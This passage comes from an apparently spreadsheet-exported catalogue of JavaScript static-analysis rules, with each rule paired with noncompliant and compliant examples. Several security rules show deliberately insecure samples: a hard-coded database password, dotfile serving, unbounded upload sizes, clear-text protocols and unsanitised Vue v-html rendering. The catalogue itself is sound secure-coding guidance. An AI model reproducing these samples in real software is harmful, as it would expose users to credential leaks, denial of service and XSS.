&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
const arr = [4, 3, 2, 1];
for (let value in arr) {  // Noncompliant
  console.log(value);  // logs 0, 1, 2, 3
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
const arr = [4, 3, 2, 1];
for (let value of arr) {
  console.log(value);
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S4138</t>
  </si>
  <si>
    <t>"for of" should be used with Iterables</t>
  </si>
  <si>
    <t>&lt;p&gt;If you have an iterable, such as an array, set, or list, your best option for looping through its values is the &lt;code&gt;for of&lt;/code&gt; syntax. Use a
counter, and â€¦â€‹ well youâ€™ll get the right behavior, but your code just isnâ€™t as clean or clear.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
const arr = [4, 3, 2, 1];
for (let i = 0; i &amp;lt; arr.length; i++) {  // Noncompliant
  console.log(arr[i]);
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
const arr = [4, 3, 2, 1];
for (let value of arr) {
  console.log(value);
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S109</t>
  </si>
  <si>
    <t>Magic numbers should not be used</t>
  </si>
  <si>
    <t>&lt;p&gt;A magic number is a number that comes out of nowhere, and is directly used in a statement. Magic numbers are often used, for instance to limit the
number of iterations of a loop, to test the value of a property, etc.&lt;/p&gt;
&lt;p&gt;Using magic numbers may seem obvious and straightforward when youâ€™re writing a piece of code, but they are much less obvious and straightforward at
debugging time.&lt;/p&gt;
&lt;p&gt;That is why magic numbers must be demystified by first being assigned to clearly named variables before being used.&lt;/p&gt;
&lt;p&gt;-1, 0 and 1 are not considered magic numbers.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
function doSomething() {
  for (let i = 0; i &amp;lt; 4; i++) {    // Noncompliant, 4 is a magic number
    // ...
  }
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
function doSomething() {
  const numberOfCycles = 4;
  for (let i = 0; i &amp;lt; numberOfCycles; i++) {
    // ...
  }
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S5693</t>
  </si>
  <si>
    <t>Allowing requests with excessive content length is security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;Rejecting requests with significant content length is a good practice to control the network traffic intensity and thus resource consumption in
order to prevents DoS attacks.&lt;/p&gt;
&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; size limits are not defined for the different resources of the web application. &lt;/li&gt;
  &lt;li&gt; the web application is not protected by &lt;a href="https://en.wikipedia.org/wiki/Rate_limiting"&gt;rate limiting&lt;/a&gt; features. &lt;/li&gt;
  &lt;li&gt; the web application infrastructure has limited resources. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There is a risk if you answered yes to any of those questions.&lt;/p&gt;
&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; For most of the features of an application, it is recommended to limit the size of requests to:
    &lt;ul&gt;
      &lt;li&gt; lower or equal to 8mb for file uploads. &lt;/li&gt;
      &lt;li&gt; lower or equal to 2mb for other requests. &lt;/li&gt;
    &lt;/ul&gt;  &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;It is recommended to customize the rule with the limit values that correspond to the web application.&lt;/p&gt;
&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/formidable"&gt;formidable&lt;/a&gt; file upload module:&lt;/p&gt;
&lt;pre&gt;
const form = new Formidable();
form.maxFileSize = 10000000; // Sensitive: 10MB is more than the recommended limit of 8MB
const formDefault = new Formidable(); // Sensitive, the default value is 200MB
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/multer"&gt;multer&lt;/a&gt; (Express.js middleware) file upload module:&lt;/p&gt;
&lt;pre&gt;
let diskUpload = multer({
  storage: diskStorage,
  limits: {
    fileSize: 10000000; // Sensitive: 10MB is more than the recommended limit of 8MB
  }
});
let diskUploadUnlimited = multer({ // Sensitive: the default value is no limit
  storage: diskStorage,
});
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/body-parser"&gt;body-parser&lt;/a&gt; module:&lt;/p&gt;
&lt;pre&gt;
// 4MB is more than the recommended limit of 2MB for non-file-upload requests
let jsonParser = bodyParser.json({ limit: "4mb" }); // Sensitive
let urlencodedParser = bodyParser.urlencoded({ extended: false, limit: "4mb" }); // Sensitive
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/formidable"&gt;formidable&lt;/a&gt; file upload module:&lt;/p&gt;
&lt;pre&gt;
const form = new Formidable();
form.maxFileSize = 8000000; // Compliant: 8MB
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/multer"&gt;multer&lt;/a&gt; (Express.js middleware) file upload module:&lt;/p&gt;
&lt;pre&gt;
let diskUpload = multer({
  storage: diskStorage,
  limits: {
     fileSize: 8000000 // Compliant: 8MB
  }
});
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/body-parser"&gt;body-parser&lt;/a&gt; module:&lt;/p&gt;
&lt;pre&gt;
let jsonParser = bodyParser.json(); // Compliant, when the limit is not defined, the default value is set to 100kb
let urlencodedParser = bodyParser.urlencoded({ extended: false, limit: "2mb" }); // Compliant
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://cheatsheetseries.owasp.org/cheatsheets/Denial_of_Service_Cheat_Sheet.html"&gt;Owasp Cheat Sheet&lt;/a&gt; - Owasp Denial of Service
  Cheat Sheet &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Top_10-2017_A6-Security_Misconfiguration"&gt;OWASP Top 10 2017 Category A6&lt;/a&gt; - Security
  Misconfiguration &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/770.html"&gt;CWE-770&lt;/a&gt; - Allocation of Resources Without Limits or Throttling &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/400.html"&gt;CWE-400&lt;/a&gt; - Uncontrolled Resource Consumption &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S5691</t>
  </si>
  <si>
    <t>Statically serving hidden files is security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;Hidden files are created automatically by many tools to save user-preferences, well-known examples are &lt;code&gt;.profile&lt;/code&gt;, &lt;code&gt;.bashrc&lt;/code&gt;,
&lt;code&gt;.bash_history&lt;/code&gt; or .&lt;code&gt;git&lt;/code&gt;. To simplify the view these files are not displayed by default using operating system commands like
&lt;code&gt;ls&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Outside of the user environment, hidden files are sensitive because they are used to store privacy-related information or even hard-coded
secrets.&lt;/p&gt;
&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; Hidden files may have been inadvertently uploaded to the static serverâ€™s public directory and it accepts requests to hidden files. &lt;/li&gt;
  &lt;li&gt; There is no business use cases linked to serve files in &lt;code&gt;.name&lt;/code&gt; format but the server is not configured to reject requests to this
  type of files. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There is a risk if you answered yes to any of those questions.&lt;/p&gt;
&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; Disable the serving of hidden files. &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/serve-static"&gt;Express.js serve-static&lt;/a&gt; middleware:&lt;/p&gt;
&lt;pre&gt;
let serveStatic = require("serve-static");
let app = express();
let serveStaticMiddleware = serveStatic('public', { 'index': false, 'dotfiles': 'allow'});   // Sensitive
app.use(serveStaticMiddleware);
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/serve-static"&gt;Express.js serve-static&lt;/a&gt; middleware:&lt;/p&gt;
&lt;pre&gt;
let serveStatic = require("serve-static");
let app = express();
let serveStaticMiddleware = serveStatic('public', { 'index': false, 'dotfiles': 'ignore'});   // Compliant: ignore or deny are recommended values
let serveStaticDefault = serveStatic('public', { 'index': false});   // Compliant: by default, "dotfiles" (file or directory that begins with a dot) are not served (with the exception that files within a directory that begins with a dot are not ignored), see serve-static module documentation
app.use(serveStaticMiddleware);
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://github.com/mtojek/go-url-fuzzer"&gt;github.com/mtojek/go-url-fuzzer&lt;/a&gt; - Discover hidden files and directories on a web server.
  &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Top_10-2017_A6-Security_Misconfiguration"&gt;OWASP Web Top 10 2017 Category A6&lt;/a&gt; - Security
  Misconfiguration. &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/538.html"&gt;CWE-538&lt;/a&gt; - File and Directory Information Exposure &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S1656</t>
  </si>
  <si>
    <t>Variables should not be self-assigned</t>
  </si>
  <si>
    <t>&lt;p&gt;There is no reason to re-assign a variable to itself. Either this statement is redundant and should be removed, or the re-assignment is a mistake
and some other value or variable was intended for the assignment instead.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
function setName(name) {
    name = name;
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
function setName(name) {
    this.name = name;
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1536</t>
  </si>
  <si>
    <t>Function argument names should be unique</t>
  </si>
  <si>
    <t>&lt;p&gt;Function arguments should all have different names to prevent any ambiguity. Indeed, if arguments have the same name, the last duplicated argument
hides all the previous arguments with the same name (those previous arguments remain available through arguments[i], so theyâ€™re not completely
inaccessible).&lt;/p&gt;
&lt;p&gt;This hiding makes no sense, reduces understandability and maintainability, and obviously can be error prone. Furthermore, in strict mode, declaring
arguments with the same name produces an error.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
function compute(a, a, c) { // Noncompliant
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
function compute(a, b, c) { // Compliant
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1537</t>
  </si>
  <si>
    <t>Trailing commas should not be used</t>
  </si>
  <si>
    <t>&lt;p&gt;Most browsers parse and discard a meaningless, trailing comma. Unfortunately, thatâ€™s not the case for Internet Explorer below version 9, which
throws a meaningless error. Therefore trailing commas should be eliminated.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
var settings = {
    'foo'  : oof,
    'bar' : rab,    // Noncompliant - trailing comma
};
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
var settings = {
    'foo'  : oof,
    'bar' : rab
};
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S2068</t>
  </si>
  <si>
    <t>Hard-coded credentials are security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;Because it is easy to extract strings from an application source code or binary, credentials should not be hard-coded. This is particularly true
for applications that are distributed or that are open-source.&lt;/p&gt;
&lt;p&gt;In the past, it has led to the following vulnerabilities:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13466"&gt;CVE-2019-13466&lt;/a&gt; &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15389"&gt;CVE-2018-15389&lt;/a&gt; &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Credentials should be stored outside of the code in a configuration file, a database, or a management service for secrets.&lt;/p&gt;
&lt;p&gt;This rule flags instances of hard-coded credentials used in database and LDAP connections. It looks for hard-coded credentials in connection
strings, and for variable names that match any of the patterns from the provided list.&lt;/p&gt;
&lt;p&gt;Itâ€™s recommended to customize the configuration of this rule with additional credential words such as "oauthToken", "secret", â€¦â€‹&lt;/p&gt;
&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; Credentials allows access to a sensitive component like a database, a file storage, an API or a service. &lt;/li&gt;
  &lt;li&gt; Credentials are used in production environments. &lt;/li&gt;
  &lt;li&gt; Application re-distribution is required before updating the credentials. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There is a risk if you answered yes to any of those questions.&lt;/p&gt;
&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; Store the credentials in a configuration file that is not pushed to the code repository. &lt;/li&gt;
  &lt;li&gt; Store the credentials in a database. &lt;/li&gt;
  &lt;li&gt; Use your cloud providerâ€™s service for managing secrets. &lt;/li&gt;
  &lt;li&gt; If the a password has been disclosed through the source code: change it. &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;
&lt;pre&gt;
var mysql = require('mysql');
var connection = mysql.createConnection(
{
  host:'localhost',
  user: "admin",
  database: "project",
  password: "mypassword", // sensitive
  multipleStatements: true
});
connection.connect();
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
var mysql = require('mysql');
var connection = mysql.createConnection({
  host: process.env.MYSQL_URL,
  user: process.env.MYSQL_USERNAME,
  password: process.env.MYSQL_PASSWORD,
  database: process.env.MYSQL_DATABASE
});
connection.connect();
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Top_10-2017_A2-Broken_Authentication"&gt;OWASP Top 10 2017 Category A2&lt;/a&gt; - Broken Authentication &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/798"&gt;MITRE, CWE-798&lt;/a&gt; - Use of Hard-coded Credentials &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/259"&gt;MITRE, CWE-259&lt;/a&gt; - Use of Hard-coded Password &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.sans.org/top25-software-errors/#cat3"&gt;SANS Top 25&lt;/a&gt; - Porous Defenses &lt;/li&gt;
  &lt;li&gt; Derived from FindSecBugs rule &lt;a href="https://h3xstream.github.io/find-sec-bugs/bugs.htm#HARD_CODE_PASSWORD"&gt;Hard Coded Password&lt;/a&gt; &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S5332</t>
  </si>
  <si>
    <t>Using clear-text protocols is security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;Clear-text protocols as &lt;code&gt;ftp&lt;/code&gt;, &lt;code&gt;telnet&lt;/code&gt; or non secure &lt;code&gt;http&lt;/code&gt; are lacking encryption of transported data. They are
also missing the capability to build an authenticated connection. This mean that any attacker who can sniff traffic from the network can read, modify
or corrupt the transported content. These protocol are not secure as they expose applications to a large range of risk:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; Sensitive data exposure &lt;/li&gt;
  &lt;li&gt; Traffic redirected to a malicious endpoint &lt;/li&gt;
  &lt;li&gt; Malware infected software update or installer &lt;/li&gt;
  &lt;li&gt; Execution of client side code &lt;/li&gt;
  &lt;li&gt; Corruption of critical information &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Note also that using the &lt;code&gt;http&lt;/code&gt; protocol is being deprecated by &lt;a
href="https://blog.mozilla.org/security/2015/04/30/deprecating-non-secure-http"&gt;major web browser&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;In the past, it has led to the following vulnerabilities:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2019-6169"&gt;CVE-2019-6169&lt;/a&gt; &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2019-12327"&gt;CVE-2019-12327&lt;/a&gt; &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2019-11065"&gt;CVE-2019-11065&lt;/a&gt; &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; The confidentiality and integrity of data is necessary in the context of the web application. &lt;/li&gt;
  &lt;li&gt; The data is exchanged on an exposed network (Internet, public network etc). &lt;/li&gt;
  &lt;li&gt; Your application renders web pages with a relaxed mixed content policy. &lt;/li&gt;
  &lt;li&gt; OS level protections against clear-text traffic are deactivated. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There is a risk if you answered yes to any of those questions.&lt;/p&gt;
&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; Use &lt;code&gt;ssh&lt;/code&gt; as an alternative to &lt;code&gt;telnet&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; Use &lt;code&gt;sftp&lt;/code&gt;, &lt;code&gt;scp&lt;/code&gt; or &lt;code&gt;ftps&lt;/code&gt; instead of &lt;code&gt;ftp&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; Use &lt;code&gt;https&lt;/code&gt; instead of &lt;code&gt;http&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; Use &lt;code&gt;SMTP&lt;/code&gt; over &lt;code&gt;SSL/TLS&lt;/code&gt; or &lt;code&gt;SMTP&lt;/code&gt; with &lt;code&gt;STARTTLS&lt;/code&gt; instead of clear-text SMTP &lt;/li&gt;
  &lt;li&gt; Configure your application to block mixed content when rendering web pages. &lt;/li&gt;
  &lt;li&gt; If available, enforce OS level deativation of all clear-text traffic &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;It is recommended to secure all transport channels (event local network) as it can take a single non secure connection to compromise an entire
application or system.&lt;/p&gt;
&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;
&lt;pre&gt;
url = "http://example.com"; // Sensitive
url = "ftp://anonymous@example.com"; // Sensitive
url = "telnet://anonymous@example.com"; // Sensitive
&lt;/pre&gt;
&lt;p&gt;For &lt;a href="https://nodemailer.com"&gt;nodemailer&lt;/a&gt;:&lt;/p&gt;
&lt;pre&gt;
const nodemailer = require("nodemailer");
let transporter = nodemailer.createTransport({
  secure: false, // Sensitive
  requireTLS: false // Sensitive
});
&lt;/pre&gt;
&lt;pre&gt;
const nodemailer = require("nodemailer");
let transporter = nodemailer.createTransport({}); // Sensitive
&lt;/pre&gt;
&lt;p&gt;For &lt;a href="https://github.com/mscdex/node-ftp"&gt;ftp&lt;/a&gt;:&lt;/p&gt;
&lt;pre&gt;
var Client = require('ftp');
var c = new Client();
c.connect({
  'secure': false // Sensitive
});
&lt;/pre&gt;
&lt;p&gt;For &lt;a href="https://github.com/mkozjak/node-telnet-client"&gt;telnet-client&lt;/a&gt;:&lt;/p&gt;
&lt;pre&gt;
const Telnet = require('telnet-client'); // Sensitive
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
url = "https://example.com"; // Compliant
url = "sftp://anonymous@example.com"; // Compliant
url = "ssh://anonymous@example.com"; // Compliant
&lt;/pre&gt;
&lt;p&gt;For &lt;a href="https://nodemailer.com"&gt;nodemailer&lt;/a&gt; one of the following options must be set:&lt;/p&gt;
&lt;pre&gt;
const nodemailer = require("nodemailer");
let transporter = nodemailer.createTransport({
  secure: true, // Compliant
  requireTLS: true, // Compliant
  port: 465, // Compliant
  secured: true // Compliant
});
&lt;/pre&gt;
&lt;p&gt;For &lt;a href="https://github.com/mscdex/node-ftp"&gt;ftp&lt;/a&gt;:&lt;/p&gt;
&lt;pre&gt;
var Client = require('ftp');
var c = new Client();
c.connect({
  'secure': true // Compliant
});
&lt;/pre&gt;
&lt;h2&gt;Exceptions&lt;/h2&gt;
&lt;p&gt;No issue is reported for the following cases because they are not considered sensitive:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; Insecure protocol scheme followed by loopback addresses like 127.0.0.1 or &lt;code&gt;localhost&lt;/code&gt; &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure"&gt;OWASP Top 10 2017 Category A3&lt;/a&gt; - Sensitive Data Exposure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href="https://cwe.mitre.org/data/definitions/200.html"&gt;MITRE, CWE-200&lt;/a&gt; - Exposure of Sensitive Information to an Unauthorized Actor &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/319"&gt;MITRE, CWE-319&lt;/a&gt; - Cleartext Transmission of Sensitive Information &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://security.googleblog.com/2016/09/moving-towards-more-secure-web.html"&gt;Google, Moving towards more secure web&lt;/a&gt; &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://blog.mozilla.org/security/2015/04/30/deprecating-non-secure-http/"&gt;Mozilla, Deprecating non secure http&lt;/a&gt; &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S4123</t>
  </si>
  <si>
    <t>"await" should only be used with promises</t>
  </si>
  <si>
    <t>&lt;p&gt;It is possible to use &lt;code&gt;await&lt;/code&gt; on values which are not &lt;code&gt;Promise&lt;/code&gt;s, but itâ€™s useless and misleading. The point of
&lt;code&gt;await&lt;/code&gt; is to pause execution until the &lt;code&gt;Promise&lt;/code&gt;'s asynchronous code has run to completion. With anything other than a
&lt;code&gt;Promise&lt;/code&gt;, thereâ€™s nothing to wait for.&lt;/p&gt;
&lt;p&gt;This rule raises an issue when an &lt;code&gt;await&lt;/code&gt;ed value is guaranteed not to be a &lt;code&gt;Promise&lt;/code&gt;.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
let x = 42;
await x; // Noncompliant
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
let x = new Promise(resolve =&amp;gt; resolve(42));
await x;
let y = p ? 42 : new Promise(resolve =&amp;gt; resolve(42));
await y;
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S6299</t>
  </si>
  <si>
    <t>Disabling Vue.js built-in escaping is security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;Vue.js framework prevents XSS vulnerabilities by automatically escaping HTML contents with the use of native API browsers like
&lt;code&gt;innerText&lt;/code&gt; instead of &lt;code&gt;innerHtml&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Itâ€™s still possible to explicity use &lt;code&gt;innerHtml&lt;/code&gt; and similar APIs to render HTML. Accidentally rendering malicious HTML data will
introduce an XSS vulnerability in the application and enable a wide range of serious attacks like accessing/modifying sensitive information or
impersonating other users.&lt;/p&gt;
&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;
&lt;p&gt;The application needs to render HTML content which:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; could be user controlled and not previously sanitized. &lt;/li&gt;
  &lt;li&gt; is difficult to understand how it was constructed. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There is a risk if you answered yes to any of those questions.&lt;/p&gt;
&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; Avoid injecting HTML content with &lt;code&gt;v-html&lt;/code&gt; directive unless the content can be considered 100% safe, instead try to rely as much as
  possible on built-in auto-escaping Vue.js features. &lt;/li&gt;
  &lt;li&gt; Take care when using the &lt;code&gt;v-bind:href&lt;/code&gt; directive to set URLs which can contain malicious Javascript
  (&lt;code&gt;javascript:onClick(...)&lt;/code&gt;). &lt;/li&gt;
  &lt;li&gt; Event directives like &lt;code&gt;:onmouseover&lt;/code&gt; are also prone to Javascript injection and should not be used with unsafe values. &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;
&lt;p&gt;When using Vue.js templates, the &lt;code&gt;v-html&lt;/code&gt; directive enables HTML rendering without any sanitization:&lt;/p&gt;
&lt;pre&gt;
&amp;lt;div v-html="htmlContent"&amp;gt;&amp;lt;/div&amp;gt; &amp;lt;!-- Noncompliant --&amp;gt;
&lt;/pre&gt;
&lt;p&gt;When using a rendering function, the &lt;code&gt;innerHTML&lt;/code&gt; attribute enables HTML rendering without any sanitization:&lt;/p&gt;
&lt;pre&gt;
Vue.component('element', {
  render: function (createElement) {
    return createElement(
      'div',
      {
        domProps: {
          innerHTML: this.htmlContent, // Noncompliant
        }
      }
    );
  },
});
&lt;/pre&gt;
&lt;p&gt;When using JSX, the &lt;code&gt;domPropsInnerHTML&lt;/code&gt; attribute enables HTML rendering without any sanitization:&lt;/p&gt;
&lt;pre&gt;
&amp;lt;div domPropsInnerHTML={this.htmlContent}&amp;gt;&amp;lt;/div&amp;gt; &amp;lt;!-- Noncompliant --&amp;gt;
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;p&gt;When using Vue.js templates, putting the content as a child node of the element is safe:&lt;/p&gt;
&lt;pre&gt;
&amp;lt;div&amp;gt;{{ htmlContent }}&amp;lt;/div&amp;gt;
&lt;/pre&gt;
&lt;p&gt;When using a rendering function, using the &lt;code&gt;innerText&lt;/code&gt; attribute or putting the content as a child node of the element is safe:&lt;/p&gt;
&lt;pre&gt;
Vue.component('element', {
  render: function (createElement) {
    return createElement(
      'div',
      {
        domProps: {
          innerText: this.htmlContent,
        }
      },
      this.htmlContent // Child node
    );
  },
});
&lt;/pre&gt;
&lt;p&gt;When using JSX, putting the content as a child node of the element is safe:&lt;/p&gt;
&lt;pre&gt;
&amp;lt;div&amp;gt;{this.htmlContent}&amp;lt;/div&amp;gt;
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://owasp.org/www-project-top-ten/2017/A7_2017-Cross-Site_Scripting_(XSS)"&gt;OWASP Top 10 2017 Category A7&lt;/a&gt; - Cross-Site
  Scripting (XSS) &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/79.html"&gt;MITRE, CWE-79&lt;/a&gt; - Improper Neutralization of Input During Web Page Generation
  ('Cross-site Scripting') &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/80.html"&gt;MITRE, CWE-80&lt;/a&gt; - Improper Neutralization of Script-Related HTML Tags in a Web Page
  (Basic XSS) &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/83.html"&gt;MITRE, CWE-83&lt;/a&gt; - Improper Neutralization of Script in Attributes in a Web Page
  &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/84.html"&gt;MITRE, CWE-84&lt;/a&gt; - Improper Neutralization of Encoded URI Schemes in a Web Page &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://vuejs.org/v2/guide/security.html#Injecting-HTML"&gt;Vue.js - Security - Injecting HTML&lt;/a&gt; &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S930</t>
  </si>
  <si>
    <t>Function calls should not pass extra arguments</t>
  </si>
  <si>
    <t>&lt;p&gt;You can easily call a JavaScript function with more arguments than the function needs, but the extra arguments will be just ignored by function
execution.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
function say(a, b) {
  print(a + " " + b);
}
say("hello", "world", "!"); // Noncompliant; last argument is not used
&lt;/pre&gt;
&lt;h2&gt;Exceptions&lt;/h2&gt;
&lt;p&gt;No issue is reported when &lt;code&gt;arguments&lt;/code&gt; is used in the body of the function being called.&lt;/p&gt;
&lt;pre&gt;
function doSomething(a, b) {
  compute(arguments);
}
doSomething(1, 2, 3) // Compliant
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/628.html"&gt;MITRE, CWE-628&lt;/a&gt; - Function Call with Incorrectly Specified Arguments &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S138</t>
  </si>
  <si>
    <t>Functions should not have too many lines of code</t>
  </si>
  <si>
    <t>&lt;p&gt;A function that grows too large tends to aggregate too many responsibilities.&lt;/p&gt;
&lt;p&gt;Such functions inevitably become harder to understand and therefore harder to maintain.&lt;/p&gt;
&lt;p&gt;Above a specific threshold, it is strongly advised to refactor into smaller functions which focus on well-defined tasks.&lt;/p&gt;
&lt;p&gt;Those smaller functions will not only be easier to understand, but also probably easier to test.&lt;/p&gt;
&lt;h2&gt;Exceptions&lt;/h2&gt;
&lt;p&gt;This function ignores Immediately Invoked Function Expressions (IIFE), which are functions that are created and invoked without ever being assigned
a name.&lt;/p&gt;
&lt;pre&gt;
